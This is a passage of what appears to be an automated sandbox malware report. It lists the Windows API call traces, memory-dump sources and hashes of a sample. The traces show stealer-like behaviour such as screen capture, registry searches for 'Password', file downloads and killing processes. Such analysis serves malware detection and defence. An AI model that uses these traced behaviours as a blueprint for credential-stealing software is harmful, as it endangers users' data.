                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: 635608c8e6261c3f8a8e39ee50f378a9e6715c8a96d19e6808f882bd7901ab76
                                • Instruction ID: e1b4d25fe0fa29057e83d4dab9e5cb584e02e8b9ba38b5f6ed90fbb977a4a863
                                • Opcode Fuzzy Hash: 635608c8e6261c3f8a8e39ee50f378a9e6715c8a96d19e6808f882bd7901ab76
                                • Instruction Fuzzy Hash: 6F91B131A00E109FDF329FA4DC89E7737A5ABA4704F464658E9058B2A1EFB5DC44DBC2
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AC8A2
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AC8D1
                                • lstrlen.KERNEL32(00000000), ref: 003AC8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AC932
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003AC943
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: f6325deab326ec46f6d3751c758e64c54011c8545d9afb24a1fdd0bc5300addf
                                • Instruction ID: a15ab3b5628a72714958f8384eb30de7489e33579a525c5c8a248d611bbaec30
                                • Opcode Fuzzy Hash: f6325deab326ec46f6d3751c758e64c54011c8545d9afb24a1fdd0bc5300addf
                                • Instruction Fuzzy Hash: AC61B371D2161AAFDB12EFB5C849ABF7BB8FF16340F055569E841EB201DB348D058B90
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,003B0CF0), ref: 003B4276
                                • GetDesktopWindow.USER32 ref: 003B4280
                                • GetWindowRect.USER32(00000000,?), ref: 003B428D
                                • SelectObject.GDI32(00000000,00000000), ref: 003B42BF
                                • GetHGlobalFromStream.COMBASE(003B0CF0,?), ref: 003B4336
                                • GlobalLock.KERNEL32(?), ref: 003B4340
                                • GlobalSize.KERNEL32(?), ref: 003B434D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 433e9a4bf85689ea499530dbd9bc9d0136ce5d86df687ba0ccf0b09cf5ce9ff0
                                • Instruction ID: 87af2654e19513004238557e6de02c5a5e650228402e0954dbb78c8a01a3eddc
                                • Opcode Fuzzy Hash: 433e9a4bf85689ea499530dbd9bc9d0136ce5d86df687ba0ccf0b09cf5ce9ff0
                                • Instruction Fuzzy Hash: 03513A75A10609AFDB11EFA4DC89EEEB7B9EF58300F104419FA05E7250DB34AE05DBA0
                                APIs
                                • lstrcat.KERNEL32(?,00F7F3E8), ref: 003AE00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AE037
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE07D
                                • lstrcat.KERNEL32(?,?), ref: 003AE098
                                • lstrcat.KERNEL32(?,?), ref: 003AE0AC
                                • lstrcat.KERNEL32(?,00F6A748), ref: 003AE0C0
                                • lstrcat.KERNEL32(?,?), ref: 003AE0D4
                                • lstrcat.KERNEL32(?,00F7E678), ref: 003AE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 003AE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 1f09fa19649bf261f3981e7b4f4494db58eed64805e8e90fb7437d35e4a9732a
                                • Instruction ID: 5fc75f30da0b2f9bc502be2674a2256875f3bb9c999f32d62e70cd4e951f9bdc
                                • Opcode Fuzzy Hash: 1f09fa19649bf261f3981e7b4f4494db58eed64805e8e90fb7437d35e4a9732a
                                • Instruction Fuzzy Hash: 8D618E7191151CAFCB56DB64CC48ADEB7B8FF58300F1049A5A60AA7250DF70AF899F90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00396AFF
                                • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 00396B2C
                                • StrCmpCA.SHLWAPI(?,00F7FC90), ref: 00396B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00396B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00396B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00396BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00396BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00396BF0
                                • CloseHandle.KERNEL32(00000000), ref: 00396C10
                                • InternetCloseHandle.WININET(00000000), ref: 00396C17
                                • InternetCloseHandle.WININET(?), ref: 00396C21
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 78fc8693c8d8047dd9292f1cd669b5fc4f44298fdfeaef704592429b9ab75837
                                • Instruction ID: fbfebca6a7e022a2d15a14d88e0a100cdfe6c937fd8e512e0cf152da6542e642
                                • Opcode Fuzzy Hash: 78fc8693c8d8047dd9292f1cd669b5fc4f44298fdfeaef704592429b9ab75837
                                • Instruction Fuzzy Hash: 37419271A01605AFDF21DF65DC4AFAE77B8EB54701F004458FA05EB280EF70AD449BA4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,003A4F39), ref: 003B4545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B454C
                                • wsprintfW.USER32 ref: 003B455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 003B45CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 003B45D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 003B45E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: 9O:$%hs$9O:
                                • API String ID: 885711575-419449927
                                • Opcode ID: f57a9c471fe825cd0781ec045f47e76b5fbc46767caf49317351ef90675cae04
                                • Instruction ID: 9fd1f31ca9e313a80409a7cddbf2fe3886522889ad2b258ca7b3d7b2da920622
                                • Opcode Fuzzy Hash: f57a9c471fe825cd0781ec045f47e76b5fbc46767caf49317351ef90675cae04
                                • Instruction Fuzzy Hash: 05317072A00A09BFDB21DBA4DC49FEE7778FF55704F104059F605E7180DB70AA458BA9
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039BC1F
                                • lstrlen.KERNEL32(00000000), ref: 0039BC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039BC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039BC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039BCAC
                                • lstrlen.KERNEL32(003C4AD4), ref: 0039BD23
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 1275a340217cac04d5bde0b5c71894fb8d51b5ff6ca89bfb3b1a4630084792e4
                                • Instruction ID: 1932afd748f7e9713152dc5d5809b743c7b7d21e9ed7de9fafa65592a3b8ef6a
                                • Opcode Fuzzy Hash: 1275a340217cac04d5bde0b5c71894fb8d51b5ff6ca89bfb3b1a4630084792e4
                                • Instruction Fuzzy Hash: 92A17F31A01605DFCF26EF69EA49EAEB7B4BF54304F1A8069E406DB261DB31DC45CB90
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B5F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B5F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 003B6014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 003B609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B60D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: c789b21c9d30722817a87c8a91c148d57992324cc2cd9135fdbdb54e28bcf499
                                • Instruction ID: 9167fea908933a59310a692e595758374343b535f394e648a2ab166d2092c174
                                • Opcode Fuzzy Hash: c789b21c9d30722817a87c8a91c148d57992324cc2cd9135fdbdb54e28bcf499
                                • Instruction Fuzzy Hash: 7F61A370714504DBDB1ADF5DC8D1AAEF3B6EF84308B244919E692CBB82D731ED808B55
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE07D
                                • lstrcat.KERNEL32(?,?), ref: 003AE098
                                • lstrcat.KERNEL32(?,?), ref: 003AE0AC
                                • lstrcat.KERNEL32(?,00F6A748), ref: 003AE0C0
                                • lstrcat.KERNEL32(?,?), ref: 003AE0D4
                                • lstrcat.KERNEL32(?,00F7E678), ref: 003AE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 003AE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: d6e3be09b042d7baeea0edceb2faf26145ad815c3586776b3d01e25f86f10bc1
                                • Instruction ID: 5f2482f59ba2a162656e24895b4c6fc66f75c7f89094722d92070141b1185fe1
                                • Opcode Fuzzy Hash: d6e3be09b042d7baeea0edceb2faf26145ad815c3586776b3d01e25f86f10bc1
                                • Instruction Fuzzy Hash: C6416B72911528AFCF26EB64DC49ADE73B4BF58300F0149A4B90AA7251DF309F899F90
                                APIs
                                  • Part of subcall function 003977D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00397805
                                  • Part of subcall function 003977D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0039784A
                                  • Part of subcall function 003977D0: StrStrA.SHLWAPI(?,Password), ref: 003978B8
                                  • Part of subcall function 003977D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003978EC
                                  • Part of subcall function 003977D0: HeapFree.KERNEL32(00000000), ref: 003978F3
                                • lstrcat.KERNEL32(00000000,003C4AD4), ref: 00397A90
                                • lstrcat.KERNEL32(00000000,?), ref: 00397ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 00397ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 00397AF0
                                • wsprintfA.USER32 ref: 00397B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 00397B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00397B47
                                • lstrcat.KERNEL32(00000000,003C4AD4), ref: 00397B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: b4299a96f933bd65b2f0305ca4b74d6e48781b09c6b1a5f2840d1d4ecec8d789
                                • Instruction ID: b06bf037cbf78dce8d0762df2f6c2abd45a86b5dd42f741faa44340ebcb7b67a
                                • Opcode Fuzzy Hash: b4299a96f933bd65b2f0305ca4b74d6e48781b09c6b1a5f2840d1d4ecec8d789
                                • Instruction Fuzzy Hash: 8531C376A24618EFCF12DBA8DC48EAFB779FB94300B150519E506A3340DB70ED49DBA0
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 003A820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8243
                                • lstrlen.KERNEL32(00000000), ref: 003A8260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8297
                                • lstrlen.KERNEL32(00000000), ref: 003A82B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A82EB
                                • lstrlen.KERNEL32(00000000), ref: 003A8308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8337
                                • lstrlen.KERNEL32(00000000), ref: 003A8351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8380
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
